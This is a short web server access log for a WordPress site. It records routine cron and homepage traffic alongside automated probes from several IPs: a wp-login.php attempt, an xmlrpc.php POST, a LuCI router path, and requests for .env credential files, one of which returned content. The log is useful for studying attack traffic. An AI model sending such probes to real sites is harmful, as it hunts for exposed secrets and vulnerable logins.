162.0.208.67 - - [28/Oct/2025:22:10:44 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
162.0.208.67 - - [28/Oct/2025:22:10:45 +0800] "POST /wp-login.php HTTP/1.1" 200 2919 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [28/Oct/2025:22:14:51 +0800] "POST /wp-cron.php?doing_wp_cron=1761660891.0351650714874267578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.15.147 - - [28/Oct/2025:22:14:51 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.15.147 - - [28/Oct/2025:22:14:52 +0800] "GET / HTTP/1.1" 200 33466 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [28/Oct/2025:22:22:29 +0800] "POST /wp-cron.php?doing_wp_cron=1761661349.7015900611877441406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
94.74.191.2 - - [28/Oct/2025:22:22:29 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [28/Oct/2025:22:24:23 +0800] "POST /wp-cron.php?doing_wp_cron=1761661463.2679409980773925781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.203.73 - - [28/Oct/2025:22:24:23 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.4"
43.157.203.73 - - [28/Oct/2025:22:24:23 +0800] "GET / HTTP/1.1" 200 33931 "-" "python-requests/2.32.4"
43.157.203.73 - - [28/Oct/2025:22:24:24 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
43.157.203.73 - - [28/Oct/2025:22:24:25 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
43.157.203.73 - - [28/Oct/2025:22:24:27 +0800] "GET /.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
43.157.203.73 - - [28/Oct/2025:22:24:28 +0800] "GET /.env.txt HTTP/1.1" 200 19390 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
43.157.203.73 - - [28/Oct/2025:22:24:29 +0800] "GET /.env.example HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Linux; Android 10; Pixel Build/QP1A.190711.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36"
36.133.115.36 - - [28/Oct/2025:22:30:39 +0800] "POST /wp-cron.php?doing_wp_cron=1761661839.8628211021423339843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
152.53.103.233 - - [28/Oct/2025:22:30:39 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0"
36.133.115.36 - - [28/Oct/2025:22:33:16 +0800] "POST /wp-cron.php?doing_wp_cron=1761661995.9836049079895019531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.119 - - [28/Oct/2025:22:33:16 +0800] "HEAD /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
